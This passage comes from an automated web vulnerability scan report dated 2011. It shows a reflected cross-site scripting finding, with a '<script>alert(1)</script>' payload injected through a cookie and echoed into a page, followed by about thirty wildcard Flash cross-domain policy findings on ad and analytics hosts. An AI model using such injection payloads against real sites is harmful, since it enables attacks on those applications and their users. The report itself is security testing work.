Cookie: ARPT=RNLPJJS10.160.118.20T0x0000000e_0xc7da91f0CMYKK; ASPSESSIONIDQSADQARA=OMKNBNPCLDMMJEBJGLGBFINK; ASP.NET_SessionId=tywqtg45vh52uj45zwyuwq55; FrontierPages=uState=TX&uCity=Dallas8b18d--><script>alert(1)</script>394a50af88d

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:46:39 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 18173
Content-Type: text/html
Expires: Tue, 06 Sep 2011 12:45:39 GMT
Cache-control: private


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<link href="/favic
...[SNIP]...
<a href="http://yellowpages.superpages.com/mapbasedsearch/mapsearch.jsp?city=Dallas8b18d--><script>alert(1)</script>394a50af88d&state=TX&Pagenumber=1&Termsearch=true&Partnerid=BRY-01&Portal=Frontier">
...[SNIP]...

3. Flash cross-domain policy  previous  next
There are 94 instances of this issue:

Issue background

The Flash cross-domain policy controls whether Flash client components running on other domains can perform two-way interaction with the domain which publishes the policy. If another domain is allowed by the policy, then that domain can potentially attack users of the application. If a user is logged in to the application, and visits a domain allowed by the policy, then any malicious content running on that domain can potentially gain full access to the application within the security context of the logged in user.

Even if an allowed domain is not overtly malicious in itself, security vulnerabilities within that domain could potentially be leveraged by a third-party attacker to exploit the trust relationship and attack the application which allows access.

Issue remediation

You should review the domains which are allowed by the Flash cross-domain policy and determine whether it is appropriate for the application to fully trust both the intentions and security posture of those domains.


3.1. http://40.xg4ken.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://40.xg4ken.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: 40.xg4ken.com

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 11:51:53 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Mon, 21 Dec 2009 22:59:19 GMT
ETag: "2b8012-c6-a15bfc0"
Accept-Ranges: bytes
Content-Length: 198
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

3.2. http://ad.agkn.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.agkn.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: ad.agkn.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Accept-Ranges: bytes
ETag: W/"219-1313398290000"
Last-Modified: Mon, 15 Aug 2011 08:51:30 GMT
Content-Type: application/xml
Content-Length: 219
Date: Tue, 06 Sep 2011 12:44:56 GMT
Connection: close

<?xml version="1.0"?>
    <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
    <cross-domain-policy>
    <allow-access-from domain="*" />
    </cr
...[SNIP]...

3.3. http://ad.turn.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.turn.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: ad.turn.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: private
Pragma: private
Expires: Tue, 06 Sep 2011 12:44:53 GMT
Content-Type: text/xml;charset=UTF-8
Date: Tue, 06 Sep 2011 12:44:52 GMT
Connection: close

<?xml version="1.0"?><cross-domain-policy> <allow-access-from domain="*"/></cross-domain-policy>

3.4. http://admin.brightcove.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://admin.brightcove.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: admin.brightcove.com

Response

HTTP/1.0 200 OK
Server: Apache
ETag: "4fbbc6624625a7f4c2704c08908b31df:1283167753"
Last-Modified: Mon, 30 Aug 2010 11:29:13 GMT
Accept-Ranges: bytes
Content-Length: 386
Content-Type: application/xml
Cache-Control: max-age=1200
Date: Tue, 06 Sep 2011 12:52:29 GMT
Connection: close

<?xml version="1.0"?>
<cross-domain-policy>
<!-- Note: secure=false is confusing, but basically its saying
to allow SSL connections. Their reasoning is something
abo
...[SNIP]...
<allow-access-from domain="*" secure="false" />
...[SNIP]...

3.5. http://ads.media.net/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.media.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: ads.media.net

Response

HTTP/1.0 200 OK
Date: Tue, 06 Sep 2011 12:45:18 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Wed, 27 Oct 2010 16:15:37 GMT
Accept-Ranges: bytes
Content-Length: 198
Connection: close
Content-Type: text/xml

<cross-domain-policy>
   <site-control permitted-cross-domain-policies="all"/>
   <allow-access-from domain="*" />
   <allow-http-request-headers-from domain="*" headers="*"/>
</cross-domain-policy>

3.6. http://ads.pointroll.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.pointroll.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: ads.pointroll.com

Response

HTTP/1.1 200 OK
Content-Length: 170
Content-Type: text/xml
Last-Modified: Tue, 06 Apr 2010 18:31:31 GMT
Accept-Ranges: bytes
ETag: "8e43ce60b7d5ca1:14ff"
Server: Microsoft-IIS/6.0
P3P: CP="NOI DSP COR PSAo PSDo OUR BUS OTC"
Date: Tue, 06 Sep 2011 12:45:11 GMT
Connection: close

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*" />
<allow-http-request-headers-from domain="*" headers="*"/>
</cross-domain-policy>

3.7. http://ads.yimg.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.yimg.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: ads.yimg.com

Response

HTTP/1.0 200 OK
Date: Tue, 06 Sep 2011 00:39:28 GMT
Cache-Control: max-age=315360000
Expires: Fri, 03 Sep 2021 00:39:28 GMT
Last-Modified: Mon, 01 Feb 2010 17:51:54 GMT
Accept-Ranges: bytes
Content-Length: 408
Vary: Accept-Encoding
Content-Type: application/xml
Age: 43538
Server: YTS/1.19.5

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xs
...[SNIP]...
<allow-access-from domain="*" secure="false" />
...[SNIP]...

3.8. http://ads.yldmgrimg.net/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.yldmgrimg.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: ads.yldmgrimg.net

Response

HTTP/1.0 200 OK
Last-Modified: Mon, 19 Oct 2009 20:41:08 GMT
ETag: "YM:1:f3afab59-44f8-4ca0-8b65-b58ac0bf0f75-gzip"
Content-Type: text/xml
Server: YTS/1.17.24
x-ysws-request-id: 36c54333-d328-4465-a4d1-5fdacf21cbd6
Cache-Control: max-age=315294929
Expires: Thu, 02 Sep 2021 18:40:27 GMT
Date: Tue, 06 Sep 2011 12:44:58 GMT
Content-Length: 403
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:
...[SNIP]...
<allow-access-from domain="*" secure="false"/>
...[SNIP]...

3.9. http://adserver.teracent.net/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.teracent.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: adserver.teracent.net

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
ETag: W/"373-1310680427000"
Last-Modified: Thu, 14 Jul 2011 21:53:47 GMT
Content-Type: application/xml
Content-Length: 373
Date: Tue, 06 Sep 2011 12:48:07 GMT
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<cross-domain-policy xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:noNamespaceSchemaLocation="http://www.adobe.com/xml/schemas/PolicyFile.xsd">
   <sit
...[SNIP]...
<allow-access-from domain="*" />
...[SNIP]...

3.10. http://altfarm.mediaplex.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://altfarm.mediaplex.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: altfarm.mediaplex.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
ETag: W/"204-1158796163000"
Last-Modified: Wed, 20 Sep 2006 23:49:23 GMT
Content-Type: text/xml
Content-Length: 204
Date: Tue, 06 Sep 2011 12:55:54 GMT
Connection: keep-alive

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-poli
...[SNIP]...

3.11. http://api.facebook.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.facebook.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: api.facebook.com

Response

HTTP/1.0 200 OK
Accept-Ranges: bytes
Cache-Control: max-age=2592000
Content-Type: application/xml
Expires: Thu, 06 Oct 2011 12:49:45 GMT
X-FB-Server: 10.28.9.121
Connection: close
Content-Length: 280

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" secure="false" />
<site-
...[SNIP]...

3.12. http://as.casalemedia.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://as.casalemedia.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: as.casalemedia.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Fri, 25 Feb 2011 02:27:27 GMT
ETag: "15690dc-e6-1230c1c0"
Accept-Ranges: bytes
Content-Length: 230
Content-Type: text/xml
Expires: Tue, 06 Sep 2011 12:45:56 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 06 Sep 2011 12:45:56 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<!-- Casale Media -->
<cross-domain-policy>
<allow-access-from domain="*" />
...[SNIP]...

3.13. http://as1.suitesmart.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://as1.suitesmart.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: as1.suitesmart.com

Response

HTTP/1.0 200 OK
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Thu, 17 Feb 2011 00:10:45 GMT
ETag: "19e27-ca-49c6f3a952b40"
Accept-Ranges: bytes
Content-Length: 202
Content-Type: text/xml
Date: Tue, 06 Sep 2011 12:44:42 GMT
Connection: close
Cache-Control: no-store

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy
...[SNIP]...

3.14. http://b.scorecardresearch.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: b.scorecardresearch.com

Response

HTTP/1.0 200 OK
Last-Modified: Wed, 10 Jun 2009 18:02:58 GMT
Content-Type: application/xml
Expires: Wed, 07 Sep 2011 12:45:57 GMT
Date: Tue, 06 Sep 2011 12:45:57 GMT
Content-Length: 201
Connection: close
Cache-Control: private, no-transform, max-age=86400
Server: CS

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*"/>
</cross-domain-policy
...[SNIP]...

3.15. http://by.optimost.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://by.optimost.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: by.optimost.com

Response

HTTP/1.0 200 OK
Content-Type: text/xml
Accept-Ranges: bytes
ETag: "784904063"
Last-Modified: Thu, 30 Sep 2010 23:09:18 GMT
Content-Length: 200
Server: Fast
Expires: Tue, 06 Sep 2011 11:58:57 GMT
Pragma: no-cache
Date: Tue, 06 Sep 2011 11:58:57 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

3.16. http://cdn.turn.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.turn.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: cdn.turn.com

Response

HTTP/1.0 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Pragma: private
Content-Type: text/xml;charset=UTF-8
Cache-Control: private, max-age=0
Expires: Tue, 06 Sep 2011 12:44:56 GMT
Date: Tue, 06 Sep 2011 12:44:56 GMT
Content-Length: 100
Connection: close

<?xml version="1.0"?><cross-domain-policy> <allow-access-from domain="*"/></cross-domain-policy>

3.17. http://cimage.adobe.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cimage.adobe.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: cimage.adobe.com

Response

HTTP/1.0 200 OK
Server: Apache
ETag: "5e218bdd5fdbe8b9035e9db6fa4ff6d0:1303309038"
Last-Modified: Wed, 20 Apr 2011 14:17:18 GMT
Accept-Ranges: bytes
Content-Length: 200
Content-Type: application/xml
Date: Tue, 06 Sep 2011 12:24:23 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

3.18. http://citizenstelecom.112.2o7.net/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://citizenstelecom.112.2o7.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: citizenstelecom.112.2o7.net

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 11:50:44 GMT
Server: Omniture DC/2.0.0
xserver: www4
Connection: close
Content-Type: text/html

<cross-domain-policy>
<allow-access-from domain="*" />
<allow-http-request-headers-from domain="*" headers="*" />
</cross-domain-policy>

3.19. http://comcastresidentialservices.tt.omtrdc.net/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://comcastresidentialservices.tt.omtrdc.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: comcastresidentialservices.tt.omtrdc.net

Response

HTTP/1.1 200 OK
Server: Test & Target
Content-Type: application/xml
Date: Tue, 06 Sep 2011 12:22:15 GMT
Accept-Ranges: bytes
ETag: W/"201-1313024241000"
Connection: close
Last-Modified: Thu, 11 Aug 2011 00:57:21 GMT
Content-Length: 201

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

...[SNIP]...

3.20. http://cr0.worthathousandwords.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cr0.worthathousandwords.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: cr0.worthathousandwords.com

Response

HTTP/1.0 200 OK
Content-Type: text/xml
Last-Modified: Thu, 13 Nov 2008 21:02:53 GMT
Accept-Ranges: bytes
ETag: "4a57df31d345c91:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Content-Length: 305
Cache-Control: max-age=3600
Date: Tue, 06 Sep 2011 12:49:50 GMT
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<cross-domain-policy xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:noNamespaceSchemaLocation="http://www.adobe.com/xml/schemas/PolicyFile.xsd">
   <allow-access-from domain="*"/>
...[SNIP]...

3.21. http://d.yimg.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://d.yimg.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: d.yimg.com

Response

HTTP/1.0 200 OK
Date: Fri, 02 Sep 2011 12:24:58 GMT
Cache-Control: max-age=315360000
Expires: Mon, 30 Aug 2021 12:24:58 GMT
Last-Modified: Mon, 01 Feb 2010 17:51:54 GMT
Accept-Ranges: bytes
Content-Length: 408
Vary: Accept-Encoding
Content-Type: application/xml
Age: 346877
Server: YTS/1.19.5

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xs
...[SNIP]...
<allow-access-from domain="*" secure="false" />
...[SNIP]...

3.22. http://e.yimg.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://e.yimg.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: e.yimg.com

Response

HTTP/1.0 200 OK
Date: Tue, 06 Sep 2011 05:38:35 GMT
Cache-Control: max-age=315360000
Expires: Fri, 03 Sep 2021 05:38:35 GMT
Last-Modified: Mon, 01 Feb 2010 17:51:54 GMT
Accept-Ranges: bytes
Content-Length: 408
Vary: Accept-Encoding
Content-Type: application/xml
Age: 25877
Server: YTS/1.19.5

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xs
...[SNIP]...
<allow-access-from domain="*" secure="false" />
...[SNIP]...

3.23. http://ec.atdmt.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ec.atdmt.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: ec.atdmt.com

Response

HTTP/1.0 200 OK
Content-Type: text/xml
Content-Length: 207
Allow: GET
Age: 491413
Date: Tue, 06 Sep 2011 12:48:17 GMT
Expires: Wed, 07 Sep 2011 20:18:04 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-po
...[SNIP]...

3.24. http://ehg-verizon.hitbox.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ehg-verizon.hitbox.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: ehg-verizon.hitbox.com

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 11:50:54 GMT
Server: Hitbox Gateway 9.3.6-rc1
Connection: close
Cache-Control: max-age=3600, private, proxy-revalidate
Expires: Tue, 06 Sep 2011 12:50:54 GMT
Content-Type: text/xml
Content-Length: 93

<cross-domain-policy>
   <allow-access-from domain="*" secure="false"/>
</cross-domain-policy>

3.25. http://event.adxpose.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://event.adxpose.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: event.adxpose.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Accept-Ranges: bytes
ETag: W/"203-1313179768000"
Last-Modified: Fri, 12 Aug 2011 20:09:28 GMT
Content-Type: application/xml
Content-Length: 203
Date: Tue, 06 Sep 2011 12:45:58 GMT
Connection: close

<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"><cross-domain-policy> <allow-access-from domain="*" /></cross-domain-poli
...[SNIP]...

3.26. http://event.rtrk.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://event.rtrk.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: event.rtrk.com

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 11:52:17 GMT
Server: Apache
Last-Modified: Fri, 05 Mar 2010 01:28:54 GMT
ETag: "cc-48103a373c180"
Accept-Ranges: bytes
Content-Length: 204
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CUR OUR NOR"
Keep-Alive: timeout=12, max=70
Connection: Keep-Alive
Content-Type: application/xml
Set-Cookie: NSC_wt-vtb-susl-iuuq=ffffffff096d1b7845525d5f4f58455e445a4a423660;expires=Tue, 06-Sep-2011 12:17:10 GMT;path=/;httponly

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-poli
...[SNIP]...

3.27. http://external.ak.fbcdn.net/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://external.ak.fbcdn.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: external.ak.fbcdn.net

Response

HTTP/1.0 200 OK
Server: Apache
ETag: "a27e344a618640558cd334164e432db0:1247617934"
Last-Modified: Wed, 15 Jul 2009 00:32:14 GMT
Accept-Ranges: bytes
Content-Length: 258
Content-Type: application/xml
Date: Tue, 06 Sep 2011 12:45:44 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <site-control permitted-cross-domain-policies="master-only" /
...[SNIP]...
<allow-access-from domain="*" />
...[SNIP]...

3.28. http://g-pixel.invitemedia.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://g-pixel.invitemedia.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: g-pixel.invitemedia.com

Response

HTTP/1.0 200 OK
Server: IM BidManager
Date: Tue, 06 Sep 2011 12:24:25 GMT
Content-Type: text/plain
Content-Length: 81

<cross-domain-policy>
   <allow-access-from domain="*"/>
</cross-domain-policy>

3.29. http://iar.worthathousandwords.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://iar.worthathousandwords.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: iar.worthathousandwords.com

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Content-Type: text/xml
Last-Modified: Thu, 13 Nov 2008 21:02:53 GMT
Accept-Ranges: bytes
ETag: "4a57df31d345c91:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Tue, 06 Sep 2011 12:35:21 GMT
Connection: close
Content-Length: 305

<?xml version="1.0" encoding="UTF-8"?>
<cross-domain-policy xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:noNamespaceSchemaLocation="http://www.adobe.com/xml/schemas/PolicyFile.xsd">
   <allow-access-from domain="*"/>
...[SNIP]...

3.30. http://ib.adnxs.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ib.adnxs.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

